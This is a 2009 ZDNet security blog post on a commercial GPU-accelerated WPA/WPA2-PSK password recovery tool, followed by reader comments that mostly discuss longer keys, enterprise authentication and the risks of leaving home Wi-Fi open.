ie8 fix
madison

Zero Day

Ryan Naraine, Emil Protalinski and Dancho Danchev
Home / News & Blogs / Zero Day

GPU-Accelerated Wi-Fi password cracking goes mainstream

By | January 22, 2009, 1:09pm PST

Summary: No weak password can survive a GPU-accelerated password recovery attack. Last week’s released Wireless Security Auditor is prone to shorter the time it takes for a network administrator to pen-test the strength of the WPA/WPA2-PSK passwords used on the wireless network. Its core functionality of shortening the wireless password recovery time up to a hundred [...]

Elcomsoft Wireless Security AuditorNo weak password can survive a GPU-accelerated password recovery attack. Last week’s released Wireless Security Auditor is prone to shorter the time it takes for a network administrator to pen-test the strength of the WPA/WPA2-PSK passwords used on the wireless network. Its core functionality of shortening the wireless password recovery time up to a hundred times based on the GPU used, is naturally going to empower unethical wardrivers with the ability to easily guess the no longer considered secure 8 character passwords.

What’s particularly interesting about the Wireless Security Auditor is that it attempts to accomplish the password recovery in an offline/stealth mode, instead of the noisy direct router brute forcing approach :

“Elcomsoft Wireless Security Auditor works completely in off-line, undetectable by the Wi-Fi network being probed, by analyzing a dump of network communications in order to attempt to retrieve the original WPA/WPA2-PSK passwords in plain text. Elcomsoft Wireless Security Auditor requires a valid log of wireless communications in standard tcpdumptcpdump. The tcpdumptcpdump format is supported by all commercial Wi-Fi sniffers. In order to audit your wireless network, at least one handshake packet must be present in the tcpdump file.”

Meanwhile, pen-testing companies have once again urged IT managers and end users to go beyond the 8 character password strength myth, and anticipate the risks posed by the increasingly efficient password recovery solutions hitting the market  :

“David Hobson said: “It’s a wake-up call to IT managers, pure and simple. IT managers should now move to 12 and even 16 character keys as a matter of urgency. It’s not very user-friendly, but the potential consequences of staying with eight character keys do not bear thinking about.”

As previously discussed, best practices wake-up calls remains largely ignored prompting radical solutions in countries like India for instance, which recently announced that a Wardriving police unit will be locating insecure wireless networks and notifying the owners in order to “prevent the commission of a cognizable offense”.

Kick off your day with ZDNet's daily e-mail newsletter. It's the freshest tech news and opinion, served hot. Get it.

More from “Zero Day”

Topics

Security, WiFi, Wardriving, Password Recovery, Password Cracking, ElcomSoft, Dancho Danchev

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response.

Disclosure

Dancho Danchev

More details on Dancho Danchev's current and past professional affiliations, can be found in his LinkedIn profile.

Biography

Dancho Danchev

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, and cybercrime incident response. He's been an active security blogger since 2007, and maintains a popular security blog sharing real-time threats intelligence data with the rest of the community on a daily basis. More details on Dancho Danchev's current and past professional affiliations, can be found in his LinkedIn profile. You can also follow him on Twitter

Related Discussions on TechRepublic

Did you know you can take part in these discussions with your ZDNet membership?
Ask a Question Start a Discussion
35
Comments
Add Your Opinion

Join the conversation!

Just In

RE: GPU-Accelerated Wi-Fi password cracking goes mainstream
birumut Updated - 4th May 2011
Great!!! thanks for sharing this information to us!
seslisohbet seslichat
View in thread
0 Votes
+ -
8? 12? 16? In a business?
MGP2 Updated - 22nd Jan 2009
Hell, my own key is 20 characters AT HOME! I would hope any sensible IT manager would use way more than 8!

And my router password is 13 characters.
0 Votes
+ -
user issues
mikey3211 22nd Jan 2009
The biggest problem I've found in attempting strong passwords is the yelling and screaming of users, in particular senior and executive management. The average user just grumbles and puts up with it but several senior and executive staff where I work are insulted that they have to do the same stuff as everyone else.

It took me 8 months of serious battling to allow me to take an 8-12 character alpha-only password up to 8+ base64 password combo. And that only changed when I was able to 'hack' the CEO's laptop by using a bluetooth enabled video camera.
0 Votes
+ -
Humm
CobraA1 23rd Jan 2009
Humm, well, in this case, it's the wi-fi password, so it's not an everyday password needed to login.

But - point taken. I personally don't have the real world experience you have (finishing up college), but I am aware that yes, sometimes users can be a bit of a pain, especially when it comes to passwords.
0 Votes
+ -
Tokens
JT82 23rd Jan 2009
The heart of the article is for Wi-FI PSKs, but for general logons, thats why tokens (RSA Secure ID's, Smart Cards, USB keys) are the way to go. Makes a very secure password, usually secured by a 6-8 digit PIN (again usually with a 3 strikes your out rule to lock the token). To get back to the Wi-FI PSK, I personally use 50ish alpah-numeric + special character, randomized, at the WPA2 only level...but WPA2-ENT (802.1x authentication via Certificate) seems the best way to go.
0 Votes
+ -
RE: GPU-Accelerated Wi-Fi password cracking goes mainstream
Boxarox 22nd Jan 2009
Tell me why I should password secure my home wifi again ? Does sharing slow down my bandwith?
Seriously...? The harm?
0 Votes
+ -
Yes.
CobraA1 Updated - 22nd Jan 2009
"Tell me why I should password secure my home wifi again?"

Depends - for many people, it also acts like a hardware router. If the hackers can hack it, they can redirect packets. This is a spammer's dream come true.

"Does sharing slow down my bandwith?"

Yes. Duh. Unless you have infinite bandwidth, this is like asking if 1+1=2.
0 Votes
+ -
Responsible networking
JT82 23rd Jan 2009
Well, for you specifically, maybe - maybe not. Now if you have Comcast or another cable system, you could be harming the other users by letting everyone else use your HSI connection to download what they wish (oh and be advised, you'll be left holding the bag for whatever crosses your pipes).

Enabling encryption on your device (if its of ANY quality) will give you a negligible impact on performance. I have a 50ish character WPA2 (AES-CCMP), alpha-numeric, special symbols, etc - and randomized - and I have no performance issues.
0 Votes
+ -
Why? Two very good reasons I can think of right off the bat
MGP2 24th Jan 2009
Kiddie porn and illegal file sharing of copyrighted media files. If you leave your network unsecured, anyone with access can download the aforementioned files and it's your modem that will be identified to your ISP. That enough to scare you into securing your network?
0 Votes
+ -
Legal problems too...
pico_D 27th Jan 2009
As the others have said, it does rob you of bandwidth and allows people to spam from your location...

But in some places (like here in Germany), you are legally responsible for everything that travels over your DSL connection. If they spam or upload kiddie-pr0n, share music etc. and you haven't kept a security log of who accessed your network, when and what they did, you are legally responsible:

If you have an open wi-fi network, you are considered to be acting as a service provider and have the same responsibilities - keeping track of who used your network and what they were doing.

I don't know how that is treated in the States, but if you end up with the RIAA beating your door down, asking for money, you won't have a fall back, unless you can show evidence that somebody else was sending/receiving the music over your connection - and that is one of the less scary scenarios... Better than the police or FBI smashing your door down, dragging you away and confiscating your equipment etc... :-S
0 Votes
+ -
Guilty until proven innocent
AzuMao Updated - 28th Jan 2009
Good ol' justice systems!

So I could just sneak into someone's house, download kiddie porn on their computer, and as long as I didn't leave any fingerprints, hair, etc., they would get sent off to prison and nothing would happen to me?


Mmm.

This system really rocks. The law definitely hurts criminals not good guys.


[/sarcasm]
Figured I should add this tag since some people are to stupid to get that I was being sarcastic..
0 Votes
+ -
Most home networks don't need to be secured
mflanery 18th Feb 2009
I think a lot of tech types really overestimate how important security is for home networks.
Most users set up their network so they can access the internet from several different computers, and don't have it set up to access different devices within their network. In this way, it's just like having a direct connection to the internet without wifi.
And for most users, it's not going to make any difference to their performance if someone else is sharing their connection. I could have my whole street hopping on my router and it wouldn't make a difference.
Kiddie porn??? If your next door neighbor is downloading kiddie porn, you probably have bigger issues to be concerned about (like the fact that your neighbor is a pedophile).
Finally, charges for excess usage - how about nationalizing the ISPs? If they can't handle it, maybe they should get into a different business.
0 Votes
+ -
Neighbor?
AzuMao 24th Feb 2009
You are either extremely deluded, extremely confused, or both.


Let me try to put it simply for you.


People can just drive by your house anonymously, without even exiting their vehicle, download/upload whatever they want through your connection, and drive away, before you even knew what happened. If any of this was illegal, expect the feds to show up at your door shortly after.


Does that put things into proportion better?
0 Votes
+ -
Well . . .
CobraA1 22nd Jan 2009
Well, since this is the Wi-Fi password we're talking about, I use a completely random, generated password at the maximum length. Windows stores it and never forgets it anyways, so there's really no need to make it something easy to memorize.
0 Votes
+ -
RE: GPU-Accelerated Wi-Fi password cracking goes mainstream
mikey3211 22nd Jan 2009
other than having someone stealing the bandwidth that you're paying for, there is also the possibility that the person using your bandwidth may be doing nasty stuff. Depending on the local laws where you are, you (as the account holder) may be considered either complicit or partially liable in any crime in a civil court that the leecher may do as your network is open.
0 Votes
+ -
what about LAN ?
it2009 22nd Jan 2009
Is this specific to wifi or can something similar be used on a wired LAN (by dishonest employees)?

Also, is 8 too short when randomly generating passwords with mixed cased letters, digits and special characters (for windows and *nix sessions) ?
0 Votes
+ -
re: LAN
CobraA1 22nd Jan 2009
"Is this specific to wifi or can something similar be used on a wired LAN (by dishonest employees)?"

This particular example is specific to wireless - the encryption is needed because radio waves can be detected from a distance and unlike a cable you're not in total control of its range and where you can access it. The encryption, therefore acts like a virtual "wire" only allowing people who are allowed to access the network to access it.

However, the ability to use GPUs to accelerate brute force cracking can be generalized, so yeah this can theoretically be used anywhere where an offline attack is available.

"Also, is 8 too short when randomly generating passwords with mixed cased letters, digits and special characters (for windows and *nix sessions) ?"

Even without this technique, 8 characters is a minimum, and to be honest, it's getting to be pretty weak. If you had 256 characters to choose from (and that's being extremely generous), then that's 64 bits. For many encryption algorithms, that may not be enough - it's much safer to have a 128 bit or larger key.
0 Votes
+ -
Depends
Suicida| 26th Jan 2009
Windows:

If you aren't storing the LM Hash, and you are using the highest lanman level "NTLMv2 only - Refuse LM & NTLM" then you are pretty safe as long as you aren't using lame passwords.

In Linux use fail2ban it will monitor /var/log/secure and configure iptables to ban the offending ip address.
0 Votes
+ -
Authentication is important
ahahum@... 22nd Jan 2009
Any enterprise network should use WPA/WPA2 with RADIUS authentication to a user database. Anything less, would be very irresponsible of the IT department. It's not that hard to setup and there are plenty of guides on the internet to assist.
0 Votes
+ -
RE: GPU-Accelerated Wi-Fi password cracking goes mainstream
Usernameisalreadyinuse,please 22nd Jan 2009
DAAAAAM talk about old news, this would have been a cool article had it come out 6 months ago.

As for the "undetectable offline" attack, that is the only way I know of actually doing it. You need a wpa handshake then you use that packet to test your keys.
0 Votes
+ -
RE: GPU-Accelerated Wi-Fi password cracking goes mainstream
Anonymous Benefactor 23rd Jan 2009
DAAAAAM talk about old news, this would have been a cool article had it come out 6 months ago. Agreed. What is the point of this article when there already was a big stink about it in early Sept. 2008. Stay a little bit more current on security issues and this may have been something to read about.
0 Votes
+ -
It's quiet in the ZDNET Office today
Alan Smithie 23rd Jan 2009
Have you people got any news ? This story is so old my Grandad told it to me..
0 Votes
+ -
what is the big deal?
Word Eater 23rd Jan 2009
PSK means pre-shared key. You only enter it the first time you set up the WiFi on your systems. Make the PSK as long and as complicated as you possibly can and write it down. It would be hard for someone to war drive a notebook in a drawer in your computer room. I usually go for about 32 characters because if I go higher, I start making mistakes when transcribing.
0 Votes
+ -
key length
ed.ahlsen-girard@... 23rd Jan 2009
I don't don't transcribe. I have an encrypted thumb drive, and I cut and paste.
0 Votes
+ -
Message has been deleted.
pcook@... Updated - 25th Jan 2009
0 Votes
+ -
I do that as well.
BillDem 28th Jan 2009
I'm using about a 32 character string when I set up my networked systems, as well. Pre-shared makes it much easier.
0 Votes
+ -
RE: GPU-Accelerated Wi-Fi password cracking goes mainstream
rdtraversi 23rd Jan 2009
I'm not up on wireless issues. If someone can log into your wireless network, can they read all the traffic or access the other computers that are connected? If so, does this mean they can read accounts and passwords for home shopping and the like?
0 Votes
+ -
RE: GPU-Accelerated Wi-Fi password cracking goes mainstream
ALFnl 23rd Jan 2009
Your bandwidth is the size of your pipe, that will not change, just the amount of data going through this pipe.

Now, let's discuss baddies using your IP-address to download/upload kiddie porn.
Next, let's discuss the next car with baddies hacking your personal PC and infecting it with malware, turning your home PC into a spam churning zombie.
When that car of hoods leaves your hood, the internet banking baddies pull up to sniff your personal data and using your identity/creditcard/bank account for their retail therapy....

Do I really need to go on or does it finally hit home why?
0 Votes
+ -
This is irrelevant for IT departments and end-users
georgeou 24th Jan 2009
This should be irrelevant for IT departments and end-
users. That's because no IT department should be
using a single common shared key for every user. If
an IT department is using WPA-PSK, the strength of the
password is irrelevant because they've got bigger
problems trying to keep a common key secret between
hundreds of users.

For WPA Enterprise mode, brute force password cracking
is not an issue because the password authentication
transaction takes place inside an SSL/TLS tunnel.
0 Votes
+ -
Let me know when 32 characters
snafu_77 26th Jan 2009
isn't safe and I'll upgrade from my wpa 64 character randomly generated key.

0 Votes
+ -
Password Length
FiOS-Dave 28th Jan 2009
The point of diminishing returns approaches when the length of the password is greater than the length of the data.

Sounds like another "Murphy's Law" to me...

Dave
0 Votes
+ -
That's not diminishing returns
AzuMao 30th Jan 2009
Diminishing returns would be when the amount of security gained compared to the password length added goes down. E.G. if the password is twice as long but only 10% more secure. That would be diminishing returns.
0 Votes
+ -
FireStream?
AzuMao 26th Jan 2009
Obviously the Tesla is going to beat a gaming video card.. let's see how it stacks up against FireStream in this test. Otherwise it's rather pointless.
0 Votes
+ -
Wifi police?
osands 29th Jan 2009
"which recently announced that a Wardriving police unit will be locating insecure wireless networks and notifying the owners in order to ?prevent the commission of a cognizable offense?.

Two enterprising teens here in Indiana did exactly that. Located houses with insecure networks and offered for a small fee to secure them. Local police arrested them for threatening homeowners with being hacked. No amount of discussion could convince the authorities they were simply looking for business leads.
0 Votes
+ -
Duh
AzuMao 30th Jan 2009
This is America. Land of the Government. It's okay as long as the Government is doing it. Otherwise, it's not.
0 Votes
+ -
RE: GPU-Accelerated Wi-Fi password cracking goes mainstream
birumut Updated - 4th May 2011
Great!!! thanks for sharing this information to us!
seslisohbet seslichat

Join the conversation!

Formatting +
BB Codes - Note: HTML is not supported in forums
  • [b] Bold [/b]
  • [i] Italic [/i]
  • [u] Underline [/u]
  • [s] Strikethrough [/s]
  • [q] "Quote" [/q]
  • [ol][*] 1. Ordered List [/ol]
  • [ul][*] · Unordered List [/ul]
  • [pre] Preformat [/pre]
  • [quote] "Blockquote" [/quote]
ie8 fix
Click Here
ie8 fix

The best of ZDNet, delivered

ZDNet Newsletters

Get the best of ZDNet delivered straight to your inbox

Facebook Activity

Blog Roll

Blog Archive

White Papers, Webcasts, & Resources
ie8 fix
ie8 fix